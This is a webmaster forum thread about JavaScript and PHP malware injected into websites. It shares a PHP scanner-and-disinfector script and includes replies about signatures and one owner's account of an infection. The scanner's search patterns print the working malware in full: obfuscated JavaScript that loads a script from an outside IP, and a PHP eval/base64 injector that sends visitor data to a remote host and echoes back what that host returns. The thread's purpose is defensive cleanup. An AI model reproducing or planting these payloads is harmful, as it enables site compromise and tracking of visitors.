Better check your JS and PHP files [new malware injects]

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • SZNY
    SZNY
    • May 2004
    • 2800

    #1

    Better check your JS and PHP files [new malware injects]

    Just wanted to share this with you as it might affect your traffic. Funny thing is that Google doesn't report it yet as badware.

    There is a new kind of JS malware virus that injects code to make 1pixel iframes and connects to certain sites.

    I just scanned 150 domains and some of my WP installs where infected.

    Here is a link from a German coder offering a workable solution. Copy the code in a php file and upload it to the root of your server.

    Once done type www.xxxx.xx/filename.php to start scanning your files.

    It also disinfects your code. Here the links:
    http://forum.nexoneu.com/NXEU.aspx?g=posts&m=3143118
    http://blog.insidecomp.com/?p=33#more-33


    PHP Code:
    <pre><!DOCTYPE html>
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>INSIDE Computer MalwareCheck 0.1</title>
    </head>
    <body>
    <h1>Javascript und PHP Files werden auf Befall gecheckt:</h1>
     
    <?php
    echo '<h2>Startverzeichnis:'.getcwd().'</h2><br/>';
    // dir_walk('/hp/ac/ab/vt/www/spd2011', 'showFiles');
    $files_checked = 0;
    $files_infected = 0;
    echo '<table>';
    dir_walk(getcwd(), 'checkFiles');
    echo '</table>';
     
    echo '<h2>Files checked: '.$files_checked.'<br/></h2>';
    echo '<h2>Files infected: '.$files_infected.'<br/></h2>';
    if ($files_infected == 0)
    {
    echo 'Alles im gr&uuml;nen Bereich...';
    }
     
    function dir_walk($start_dir, $func) {
    $entries = scandir($start_dir);
    foreach ($entries as $entry) {
    if ($entry == '.' || $entry == '..') {
    /* skip these */
    } else if (is_dir($start_dir . '/' .$entry)) {
    echo '<tr><td><b>Scanning...'.$start_dir . '/' . $entry.'</b></td></tr>';
    dir_walk($start_dir . '/' . $entry, $func);
    } else
    $func($start_dir . '/' . $entry);
    }
    }
     
    function checkFiles($filename) {
    global $html_files;
     
    // disindect javascriptFiles
    if (strpos($filename, '.js') === (strlen($filename) - 3))
    {
    echo '<tr><td>.js-File checking: '.$filename.'<td>';
    $pattern='var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;';
    disinfect($filename, $pattern);
    }
    if (strpos($filename, '.php') === (strlen($filename) - 4))
    {
    echo '<tr><td>.js-File checking: '.$filename.'<td>';
    $pattern='<?php $_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+\';eval(base64_decode(\'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==\'));$ua = urlencode(strtolower($_SERVER[\'HTTP_USER_AGENT\']));$ip = $_SERVER[\'REMOTE_ADDR\'];$host = $_SERVER[\'HTTP_HOST\'];$uri = urlencode($_SERVER[\'REQUEST_URI\']);$ref = urlencode($_SERVER[\'HTTP_REFERER\']);$url = $url.\'?ip=\'.$ip.\'&host=\'.$host.\'&uri=\'.$uri.\'&ua=\'.$ua.\'&ref=\'.$ref; $tmp = file_get_contents($url); echo $tmp; ?>';
    disinfect($filename, $pattern);
    }
     
    }
    function restore_hsc($val){
    $val = str_replace('&amp;', '&', $val);
    $val = str_replace('&ouml;', '?', $val);
    $val = str_replace('&auml;', '?', $val);
    $val = str_replace('&uuml;', '?', $val);
    $val = str_replace('&lt;', '<', $val);
    $val = str_replace('&gt;', '>', $val);
    $val = str_replace('&quot;', '"', $val);
    return $val;
    }
     
    function disinfect($filename, $pattern) {
    global $files_checked;
    $files_checked++;
    $pattern=trim(htmlspecialchars($pattern)); //prepare pattern
    $lines = file($filename);
    $found=0;
    for ($i=0; $i<sizeof($lines); $i++) {
    $current_line=trim(htmlspecialchars($lines[$i]));
    if(strstr($current_line, $pattern)) {
    $lines[$i]=str_replace($pattern, "", htmlspecialchars(trim($lines[$i])));
    $lines[$i]= preg_replace('/\s\s+/', ' ', $lines[$i]);
    $lines[$i]=restore_hsc($lines[$i]);
    $found++;
    }
    }
    $lines = array_values($lines);
    if ($found >0) {
    global $files_infected;
    $files_infected++;
    $file = fopen($filename, "w");
    fwrite($file, implode("\n",$lines));
    fclose($file);
    touch($file);
    echo " <td><span style=\"color:red;\"> is infected. Cured: $found injected objects</span></td></tr>";
    }
    else {echo " <td><span style=\"color:green;\"> - File is clean</span></td></tr>";}
    }
    ?>
    </body>
    </html>
    Telegram: sandroanthonio
  • nico-t
    emperor of my world
    • Aug 2004
    • 29903

    #2
    how will this virus affect your server? Will this cause load issues and eventually a mysql crash?

    Comment

    • SZNY
      SZNY
      • May 2004
      • 2800

      #3
      Well it will cause extra load on your server (makes more connections) plus your sites are flagged as Malware by various AV software apps
      Telegram: sandroanthonio

      Comment

      • pornguy
        Too lazy to set a custom title
        • Mar 2003
        • 62912

        #4
        this is hitting Blogs or over all sites in general?


        Can you find it by looking at the code of the index or is it hidden?
        PornGuy skype me pornguy_epic

        AmateurDough The Hottes Shemales online!
        TChicks.com | Angeles Cid | Mariana Cordoba | MAILERS WELCOME!

        Comment

        • SZNY
          SZNY
          • May 2004
          • 2800

          #5
          Doesn't matter, all sites that are using JS files
          Telegram: sandroanthonio

          Comment

          • pornguy
            Too lazy to set a custom title
            • Mar 2003
            • 62912

            #6
            OK thanks

            Damn.. More work.
            PornGuy skype me pornguy_epic

            AmateurDough The Hottes Shemales online!
            TChicks.com | Angeles Cid | Mariana Cordoba | MAILERS WELCOME!

            Comment

            • raymor
              Confirmed User
              • Oct 2002
              • 3745

              #7
              Thanks, I'll add that signature to our scanner. I'll actually be interpreting and reducing the signature to catch other variations if the same thing. The posted code is awefully specific.
              For historical display only. This information is not current:
              support&#64;bettercgi.com ICQ 7208627
              Strongbox - The next generation in site security
              Throttlebox - The next generation in bandwidth control
              Clonebox - Backup and disaster recovery on steroids

              Comment

              • pimpware
                Confirmed User
                • Jan 2006
                • 1673

                #8
                Thanks for the heads up

                All check and clean
                icq: 284494832
                realsexforyou.com

                Comment

                • blackmonsters
                  Making PHP work
                  • Nov 2002
                  • 20964

                  #9
                  Cleaning up your files is good but that doesn't fix the problem.

                  How did that get into your site to begin with is the question.
                  Free Open Source Live Aggregated Cams Script (FOSLACS)

                  Comment

                  • SZNY
                    SZNY
                    • May 2004
                    • 2800

                    #10
                    Originally posted by blackmonsters
                    Cleaning up your files is good but that doesn't fix the problem.

                    How did that get into your site to begin with is the question.
                    In my case I had some test domains which were not that secured and infected the rest of the server.

                    All is pretty closed now. Took me some time but all is cleaned and hope it can help others.
                    Telegram: sandroanthonio

                    Comment

                    • V_RocKs
                      Damn Right I Kiss Ass!
                      • Nov 2003
                      • 32449

                      #11
                      crazy h4x0r5

                      Comment

                      • Darkhorse
                        Horsing Around
                        • Sep 2002
                        • 5879

                        #12
                        Thanks for this, will have to check mine out.

                        Comment

                        • harvey
                          Confirmed User
                          • Jul 2001
                          • 9266

                          #13
                          the cleaning code itself makes my antivirus goes bananas
                          This post is endorsed by CIA, KGB, MI6, the Mafia, Illuminati, Kim Jong Il, Worldwide Ninjas Association, Klingon Empire and lolcats. Don't mess around with it, just accept it and embrace the truth

                          Comment

                          • FlorianPC
                            Registered User
                            • Mar 2011
                            • 20

                            #14
                            thanks for the code, i will check my domains too.


                            Saboom.com - interactive porn monetization solution for a free porn internet

                            Comment

                            • gabe100
                              Confirmed User
                              • Dec 2002
                              • 459

                              #15
                              If you don't think you're vulnerable read about my nightmare below. It's quite embarrassing. I don't post much. No one wants to write a story like this, hopefully it helps someone.

                              I was hit Thanksgiving day of last year. 12 years running adult sites and never a problem. In my case, the permissions on 1 php file within openx were wide open. Permissions don't sync across servers and malware was injected on my splash redirecting to a Russian site. Multiple shells were installed and if you have ever seen your backend/library via a shell with Russian headers and tags, it's the scariest thing ever.

                              Quite elegant too, all your folders and files are color coded, everything wide open.

                              The second scariest thing is looking at the code injected on to the page itself. In my case the code was 7 or 8 strange characters, you can't even see the redirect buried at the very bottom of the page. The page is straight HTML, a simple warning page. Super clean. The characters look like the innocent copyright tags.

                              That code referenced scripts buried far in my file structure.

                              Ad Words suspended, Banned from Google. Cybercat pulling me, TJ yanked me. Kenny emailing me, Paperstreet emailing me. Pornhub video b gone. Exo paused. NIGHTMARE!

                              That was my Thanksgiving.

                              The good part is it didn't last long. Once clean I resubmitted to google and within 5 seconds I was approved and it was like nothing ever happened. All references to us distributing malware within google search vanished.

                              What saved us was clonebox and Ray, having a great host and my man Konrad. The very early symptoms won't be apparent. First extremely vague warnings from Avast, then AVG then it gets wide out and the messages start rolling in from customers and partners. The nightmare really starts once you get banned from google. All paid SEO Gone, all organic SEO replaced with malware warnings.

                              Multiple servers on lockdown, thousands of folders each with perfect permissons set and yet 1 file wide open.

                              Looking back it's probably best it happened because other measures are now in place to ensure that never happens again.

                              Check your permissions and and at the very least, get a script installed that alerts you to any changes on your boxes. Having a firewall on your FTP/SSH isn't enough. These new malware injections are pretty clever.

                              Rather embarrassing, I had to learn the hard way. Hopefully you won't have to.

                              Comment

                              Working...